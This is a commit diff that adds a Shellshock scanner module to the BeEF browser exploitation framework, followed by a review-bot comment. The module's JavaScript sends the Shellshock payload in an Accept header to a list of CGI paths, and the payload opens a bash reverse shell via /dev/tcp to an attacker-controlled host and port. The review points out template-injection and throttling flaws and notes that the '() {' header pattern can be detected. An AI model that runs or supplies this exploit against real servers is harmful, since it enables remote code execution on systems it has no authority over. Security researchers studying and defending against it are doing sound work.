Add Shell Shock Scanner module
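--- a/modules/exploits/shell_shock_scanner/command.js
+++ b/modules/exploits/shell_shock_scanner/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+var rproto = '<%= @rproto %>';
+var rhost = '<%= @rhost %>';
+var rport = '<%= @rport %>';
+var lhost = '<%= @lhost %>';
+var lport = '<%= @lport %>';
+var target = rproto + '://' + rhost + ':' + rport;
+var method = '<%= @method %>';
+var wait = '<%= @wait %>';
+var timeout = '<%= @timeout %>';
+
+get_cgi = function(uri) {
+try {
+var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
+var xhr = new XMLHttpRequest();
+xhr.open(method, target+uri, true);
+xhr.onload = function () {
+};
+xhr.onreadystatechange = function () {
+if (xhr.readyState == 4 && xhr.status == 200) {
+beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
+}
+}
+xhr.setRequestHeader("Accept", payload);
+xhr.send(null);
+} catch (e){
+beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
+}
+}
+
+var scripts = new Array(
+<%=
+scripts = []
+File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
+file_handle.each_line do |line|
+uri = line.chomp!
+next if uri =~ /^#/
+next if uri.nil?
+scripts << "'#{uri}'"
+end
+end
+scripts.shuffle.join(",\n")
+%>
+);
+
+// add scripts to queue
+var requests = [];
+for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
+
+// process queue
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
+var handle = setInterval(function() {
+if (requests.length > 0) {
+get_cgi(requests.pop());
+} else cleanup();
+}, wait*1000);
+
+// clean up
+cleanup = function() {
+if (handle) {
+beef.debug("Killing timer [ID: " + handle + "]");
+clearInterval(handle);
+handle = 0;
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+}
+}
+setTimeout("cleanup();", timeout*1000);
+
+});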
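Review bot: The ERB values are written raw into single-quoted JavaScript literals (`var rhost = '<%= @rhost %>';` and the other option lines, plus `scripts << "'#{uri}'"` for each list entry), so a quote, backslash or newline in an option or in a line of the path list alters the generated script instead of staying data. Emit them through a JSON encoder instead, for example `var rhost = <%= @rhost.to_json %>;` and `scripts << uri.to_json`, assuming `json` is loaded in the template context. `wait` and `timeout` are also kept as strings and only coerced in `wait*1000` and `timeout*1000`; a non-numeric value yields NaN, which the timer treats as no delay, so the request loop would run unthrottled against the target, and both should be parsed and range-checked before the interval is started. On the monitoring side, these requests carry an `Accept` header whose value begins with `() {`, which is the pattern server-side request-header inspection can match.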